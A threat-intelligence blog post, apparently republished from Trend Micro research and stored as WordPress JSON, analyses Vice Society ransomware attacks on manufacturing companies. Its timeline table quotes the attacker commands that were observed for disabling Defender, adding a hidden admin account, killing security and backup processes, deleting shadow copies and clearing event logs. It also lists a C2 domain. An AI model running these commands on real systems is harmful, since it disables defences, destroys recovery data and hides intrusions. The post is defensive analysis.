{"id":50244,"date":"2023-01-24T00:00:00","date_gmt":"2023-01-24T00:00:00","guid":{"rendered":"urn:uuid:6eefbdf5-e7fd-869d-ea9b-414d8fc331d8"},"modified":"2023-01-24T00:00:00","modified_gmt":"2023-01-24T00:00:00","slug":"vice-society-ransomware-group-targets-manufacturing-companies","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/vice-society-ransomware-group-targets-manufacturing-companies\/","title":{"rendered":"Vice Society Ransomware Group Targets Manufacturing Companies"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/vice-society-641.jpg\"> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"50.220265900108\"> <!-- Page Scroll: Back to Top --> <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span 
class=\"icon-chevron-up\"><\/span> <\/a> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"1094816314\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"10.753117206983\">\n<div class=\"article-details\" role=\"heading\" readability=\"41.057356608479\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Ransomware<\/p>\n<p class=\"article-details__description\">In this blog entry, we\u2019d like to highlight our findings on Vice Society, which includes an end-to-end infection diagram that we were able to create using Trend Micro internal telemetry.<\/p>\n<p class=\"article-details__author-by\">By: Ieriz Nicolle Gonzalez, Paul Pajares, Arianne Dela Cruz, Warren Sto.Tomas <time class=\"article-details__date\">January 24, 2023<\/time> <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"39.602765556254\">\n<div readability=\"29.70207416719\">\n<p>The Vice Society&nbsp;<a href=\"https:\/\/www.trendmicro.com\/vinfo\/ph\/security\/definition\/ransomware\">ransomware<\/a>&nbsp;group&nbsp;<a href=\"https:\/\/www.scmagazine.com\/brief\/ransomware\/alleged-vice-society-ransomware-attack-against-san-francisco-bart-probed\">made headlines<\/a>&nbsp;in&nbsp;<a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/vice-society-ransomware-gang-switches-to-new-custom-encryptor\/\">late 2022<\/a>&nbsp;and early 2023 during a spate of 
attacks against several targets, such as the one that affected the rapid transit system in San Francisco. Most reports have the threat actor focusing its efforts on the&nbsp;<a href=\"https:\/\/www.techtarget.com\/searchsecurity\/news\/252528118\/Vice-Society-ransomware-a-persistent-threat-to-education-sector\">education<\/a>&nbsp;and the&nbsp;<a href=\"https:\/\/blog.sygnia.co\/ransomware-group-that-the-health-and-education-sectors-should-look-out-for\">healthcare<\/a>&nbsp;industries. However, through Trend Micro\u2019s telemetry data, we have evidence that the group is also targeting the manufacturing sector, which means that they have the capability and desire to penetrate different industries \u2014 most likely accomplished via the purchasing of compromised credentials from underground channels. We have detected the presence of Vice Society in Brazil (primarily affecting the country\u2019s manufacturing industry), Argentina, Switzerland, and Israel.&nbsp;<\/p>\n<p>Vice Society, which was initially reported to be exploiting the&nbsp;<a href=\"https:\/\/success.trendmicro.com\/dcx\/s\/solution\/000286888?language=en_US&amp;sfdcIFrameOrigin=null\">PrintNightmare vulnerability<\/a>&nbsp;in their routines, has previously&nbsp;<a href=\"https:\/\/www.cisa.gov\/uscert\/ncas\/alerts\/aa22-249a\">deployed ransomware variants<\/a>&nbsp;such as Hello Kitty\/Five Hands and Zeppelin (the group\u2019s email has been in their ransom notes). More recently, Vice Society has been able to develop its own&nbsp;<a href=\"https:\/\/thehackernews.com\/2022\/12\/vice-society-ransomware-attackers-adopt.html\">custom ransomware builder<\/a>&nbsp;and adopt more robust encryption methods. 
This, and any further enhancements, could mean that the group is preparing for their own ransomware-as-a-service (RaaS) operation.<\/p>\n<p>In this blog entry, we\u2019d like to highlight our findings on Vice Society, which includes an end-to-end infection diagram that we were able to create using Trend Micro internal telemetry.&nbsp;Our detection name for this variant of Vice Society\u2019s ransomware is&nbsp;<a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/Ransom.Win64.VICESOCIETY.A\/\">Ransom.Win64.VICESOCIETY.A<\/a>&nbsp;.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"138fcc\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-1.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-1.jpg\" alt=\"Figure 1. Vice Society\u2019s evolution throughout 2021 to late 2022\"> <\/a><figcaption>Figure 1. Vice Society\u2019s evolution throughout 2021 to late 2022<\/figcaption><\/figure>\n<\/p><\/div>\n<div readability=\"5.8908238446082\">\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"0e2674\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-2.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-2.jpg\" alt=\"Figure 2. 
Trend Micro \u2122 Smart Protection Network \u2122 (SPN) detections for Vice Society from November 2022 to January 2023 (unique endpoints)\"> <\/a><figcaption>Figure 2. Trend Micro \u2122 Smart Protection Network \u2122 (SPN) detections for Vice Society from November 2022 to January 2023 (unique endpoints)<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"c96472\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-3.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-3.jpg\" alt=\"Figure 3. Distribution of affected industries based on the Vice Society leak site\"> <\/a><figcaption>Figure 3. Distribution of affected industries based on the Vice Society leak site<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Based on our internal telemetry, we were able to create an infection diagram for a Vice Society ransomware attack (illustrated in Figure 4). The arrival vector likely involves the exploitation of a public-facing website or abuse of compromised remote desktop protocol (RDP) credentials.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"929340\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-4.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-4.jpg\" alt=\"Figure 4. 
The infection chain of a Vice Society attack\"> <\/a><figcaption>Figure 4. The infection chain of a Vice Society attack<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>The following table shows what we were able to observe from a Vice Society attack. Note that all endpoints indicated belong to one Pointer to the GUID.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\" height=\"5%\">\n<tbody readability=\"27.5\">\n<tr>\n<td>\n<p><b>Date<\/b><\/p>\n<\/td>\n<td width=\"463\" valign=\"top\">\n<p><b>Description<\/b><\/p>\n<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td width=\"89\" valign=\"top\">\n<p>October 28, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"7\">\n<p>Possible entry point using Cobalt Strike and the Rubeus hacktool<\/p>\n<p>Cobalt Strike connects to 57thandnormal[.]com<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"89\" valign=\"top\">\n<p>November 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"5\">\n<p>Deployed Zeppelin ransomware<\/p>\n<p>Path: C:\\mnt\\smile.exe<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"4.5\">\n<td width=\"89\" valign=\"top\">\n<p>November 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"6\">\n<p>Copied files<\/p>\n<p>kape.exe --tsource C --target RecycleBin --tdest output --zip RecycleBin_{ComputerName}<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"89\" valign=\"top\">\n<p>November 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"5\">\n<p>Deployed Mimikatz<\/p>\n<p>Path: C:\\ProgramData\\toolkiit\\{redacted}\\output\\C\\<br \/>$Recycle.Bin\\{redacted}\\$RY0DNVE.exe<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"5.5\">\n<td width=\"89\" valign=\"top\">\n<p>November 12, 2022<\/p>\n<\/td>\n<td 
width=\"463\" valign=\"top\" readability=\"8\">\n<p>Executed a PowerShell script (w1.ps1)<\/p>\n<p>Command: \/c powershell.exe -ExecutionPolicy Bypass -file \\\\{ComputerName}\\s$\\w1.ps1<br \/>-ExecutionPolicy Bypass -file \\\\{ComputerName}\\s$\\w1.ps1<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"8.5\">\n<td width=\"89\" valign=\"top\">\n<p>November 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"10\">\n<p>Disabled antivirus (AV) programs such as Trend Micro Apex One and Windows Defender<\/p>\n<p>\/i \\\\{ComputerName}\\netlogon\\ApexOneCloud\\agent_cloud_x64.msi \/quiet<br \/>&nbsp;add &#8220;HKLM\\Software\\Policies\\Microsoft\\Windows Defender&#8221; \/v DisableAntiVirus \/t REG_DWORD \/d 1 \/f<br \/>&nbsp;add &#8220;HKLM\\Software\\Policies\\Microsoft\\Windows Defender&#8221; \/v DisableAntiSpyware \/t REG_DWORD \/d 1 \/f<br \/>&nbsp;add &#8220;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine&#8221; \/v MpEnablePus \/t REG_DWORD \/d 0 \/f<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"89\" valign=\"top\">\n<p>November 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"7\">\n<p>Deployed Vice Society ransomware<\/p>\n<p>Path: C:\\ProgramData\\test.exe<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"10.5\">\n<td width=\"89\" valign=\"top\">\n<p>November 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"12\">\n<p>Created Administrator account on each endpoint, add to Administrators and Remote Desktop Users localgroup<\/p>\n<p>user Administrator {password} \/add<br \/>user Administrator {password} \/add<br \/>localgroup Administrators Administrator \/ADD<br \/>localgroup &#8220;Remote Desktop Users&#8221; Administrator \/ADD<br \/>add &#8220;HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist&#8221; \/v Administrator \/t REG_DWORD \/d 0 \/f<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"8.5\">\n<td width=\"89\" valign=\"top\">\n<p>November 12, 
2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"10\">\n<p>Terminated processes such as AV and security software.<\/p>\n<p>process where \u201cname like \u2018%Agent%\u2019\u201d delete<br \/>process where \u201cname like \u2018%Malware%\u2019\u201d delete<br \/>process where \u201cname like \u2018%Endpoint%\u2019\u201d delete<br \/>process where \u201cname like \u2018%sql%\u2019\u201d delete<br \/>process where \u201cname like \u2018%Veeam%\u2019\u201d delete<br \/>process where \u201cname like \u2018%Core.Service%\u2019\u201d delete<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"89\" valign=\"top\">\n<p>November 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"5\">\n<p>Exfiltrated important files<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"5.5\">\n<td width=\"89\" valign=\"top\">\n<p>November 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"8\">\n<p>Multiple deployments of Vice Society ransomware were dropped in the %Temp% directory on different endpoints<\/p>\n<p>Path: C:\\windows\\temp\\svchost.exe<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"89\" valign=\"top\">\n<p>November 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"5\">\n<p>Observed file infector Neshta<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"89\" valign=\"top\">\n<p>November 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"7\">\n<p>Performed ransomware routine via $mytemp$\\svchost.exe<\/p>\n<p>&#8220;\/c vssadmin.exe Delete Shadows \/All \/Quiet<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"9.5\">\n<td width=\"89\" valign=\"top\">\n<p>November 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"10\">\n<p>Vice Society ransomware routine is performed (files are encrypted, ransom note with email contacts is dropped and files are appended with the extension .v1cesO0ciety)<\/p>\n<p>Ransom note: AllYFilesAE!<br \/>Extension: .v1cesO0ciety<br \/>Contact email 
of ransom operators:<br \/>876505846904@onionmail[.]org<br \/>316186524106@onionmail[.]org<br \/>v-society.official@onionmail[.]org<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"8.5\">\n<td width=\"89\" valign=\"top\">\n<p>November 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"10\">\n<p>Event viewer logs and remote session traces such as RDP and terminal services were cleared<\/p>\n<p>reg delete &#8220;&#8221;HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default&#8221;&#8221; \/va \/f<br \/>reg delete &#8220;&#8221;HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers&#8221;&#8221; \/f<br \/>reg add &#8220;&#8221;HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers&#8221;&#8221;<br \/>cd %userprofile%\\documents\\<br \/>attrib Default.rdp -s -h<br \/>del Default.rdp<br \/>for \/F &#8220;&#8221;tokens=*&#8221;&#8221; %1 in (&#8216;wevtutil.exe el&#8217;) DO wevtutil.exe cl &#8220;&#8221;%1&#8243;&#8221;&#8221;<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td width=\"89\" valign=\"top\">\n<p>November 12, 2022<\/p>\n<\/td>\n<td width=\"463\" valign=\"top\" readability=\"7\">\n<p>Deleted itself from the system<\/p>\n<p>&#8220;%System%\\cmd.exe&#8221; \/c del {Malware File Path}\\{Malware File Name} -&gt; nul -&gt; to delete itself<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<p><h5>Table 1. Date and description of the routines involved in a Vice Society attack<\/h5>\n<\/p><\/div>\n<div class=\"richText\" readability=\"43.700934579439\">\n<div readability=\"34.576563623293\">\n<p>The weaponized tool used by Vice Society is <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/g\/tracking_cobalt_strike_a_vision_one_investigation.html\">Cobalt Strike<\/a>, which allows the group to remotely access and control the infected endpoint. 
The threat actor also used the Rubeus C# toolset for raw Kerberos interaction and abuse (although this is not a new technique, since it has been previously used by Ryuk, Conti, and <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2022\/06\/13\/the-many-lives-of-blackcat-ransomware\/\">BlackCat<\/a>).<\/p>\n<p>To move laterally within the target network, the threat actor used Mimikatz to dump passwords and the Kape tool to copy files. We also observed the presence of the Zeppelin ransomware from another endpoint that also uses Kape for data exfiltration. Vice Society was known to have deployed Zeppelin before; however, perhaps due to its weaker encryption, the threat actor decided to go with custom-built ransomware.<\/p>\n<p>Vice Society will then execute a PowerShell script to create an administrator account that allows for the remote access of other endpoints and to terminate several processes such as running security software before dropping the custom-built ransomware. In most of the Vice Society detections, we also observed the presence of the Neshta file infector (which can be cleaned by Trend Micro), although it is not clear how this occurred.<\/p>\n<p>Virtual servers, such as Microsoft Hyper-V, are also affected in this attack. 
We also found the attacker removing traces of RDP sessions using tools such as wevtutil.exe, a technique that was <a href=\"https:\/\/twitter.com\/malwrhunterteam\/status\/1314960487507951617?lang=en\">previously used by Clop ransomware<\/a> and KillDisk.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"7b8b71\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-5a1.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-5a1.jpg\" alt=\"Figure 5. The ransomware note (top) and desktop ransom message (bottom) displayed on the victim\u2019s machine\"> <\/a> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"f0eb51\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-5b.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-5b.jpg\" alt=\"Figure 5. The ransomware note (top) and desktop ransom message (bottom) displayed on the victim\u2019s machine\"> <\/a><figcaption>Figure 5. 
The ransomware note (top) and desktop ransom message (bottom) displayed on the victim\u2019s machine<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"2a3816\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-6.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-6.jpg\" alt=\"Figure 6. The primary TOR website and mirror links\"> <\/a><figcaption>Figure 6. The primary TOR website and mirror links<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"2eb69e\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-7.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/vice-society-7.jpg\" alt=\"Figure 7. Vice Society\u2019s file storage site\"> <\/a><figcaption>Figure 7. 
Vice Society\u2019s file storage site<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>Once the administrator account is added and established, Vice Society can terminate several processes, including security-related ones, to enable the successful deployment and execution of its ransomware on the affected endpoints.&nbsp;<b><\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<ul>\n<li><span class=\"rte-red-bullet\"><b>%Agent%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%Malware%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%Endpoint%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%sql%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%Veeam%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%Core.Service%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%Mongo%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%Backup%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%QuickBooks%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%QBDB%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%QBData%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%QBCF%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%Kaspersky%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%server%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%sage%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%http%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%apache%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%segurda%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%center%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%silverlight%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%exchange%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%manage%<\/b><\/span><\/li>\n<li><span 
class=\"rte-red-bullet\"><b>%acronis%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%autodesk%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%database%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%firefox%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%chrome%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%barracuda%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%arcserve%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%sprout%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%anydesk%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%protect%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%secure%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%adobe%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%java%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%logmein%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%microsoft%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%solarwinds%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%engine%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%web%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%vnc%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%teamviewer%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%OCSInventory%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%monitor%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%security%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%def%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%dev%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%office%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%Framework%<\/b><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>%AlwaysOn%<\/b><\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"37.242857142857\">\n<div readability=\"22.628571428571\">\n<p>Vice Society seems to be constantly improving their capabilities, managing to build their own custom-built ransomware while also continuing to employ toolsets such as Cobalt Strike and malware such as Zeppelin and Hello Kitty\/FiveHands to enhance their routines. Furthermore, the use of the Kape tool can speed up the identification of important files from a computer. 
Given what we know of the group\u2019s technical knowledge and their willingness to target several different industries and regions, we can expect them to remain a significant player in the ransomware landscape and a threat that organizations must keep track of moving forward.<\/p>\n<p>A multilayered approach can help organizations guard possible entry points into their system, such as endpoints, emails, web, and networks. The following security solutions can detect malicious components and suspicious behavior, which can help protect enterprises.<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response.html\">Trend Micro Vision One\u2122<\/a>&nbsp;provides multilayered protection and behavior detection, which helps block questionable behavior and tools early on before the ransomware can do irreversible damage to the system.<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/hybrid-cloud\/cloud-one-workload-security.html\">Trend Micro Cloud One\u2122<\/a>&nbsp;Workload Security protects systems against both known and unknown threats that exploit vulnerabilities. 
This protection is made possible through techniques such as virtual patching and machine learning.<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection\/sps\/email-and-collaboration\/email-inspector.html\">Trend Micro\u2122 Deep Discovery\u2122<\/a>&nbsp;Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails, including phishing emails that can serve as entry points for ransomware.<\/span><\/li>\n<li><span class=\"rte-red-bullet\"><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/user-protection\/sps\/endpoint.html\">Trend Micro Apex One\u2122<\/a>&nbsp;offers next-level automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints.<\/span><\/li>\n<\/ul>\n<p>The indicators of compromise for this blog entry can be found <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/vice-society-ransomware-group-targets-manufacturing-companies\/iocs-vice-society-ransomware-group-targets-manufacturing-companies-full.txt\">here<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/a\/vice-society-ransomware-group-targets-manufacturing-companies.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this blog entry, we\u2019d like to highlight our findings on Vice Society, which includes an end-to-end 
infection diagram that we were able to create using Trend Micro internal telemetry. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":50245,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9508,9539,9509],"class_list":["post-50244","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-endpoints","tag-trend-micro-research-ransomware","tag-trend-micro-research-research"],"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/50244","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=50244"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/50244\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/50245"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=50244"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=50244"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=50244"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}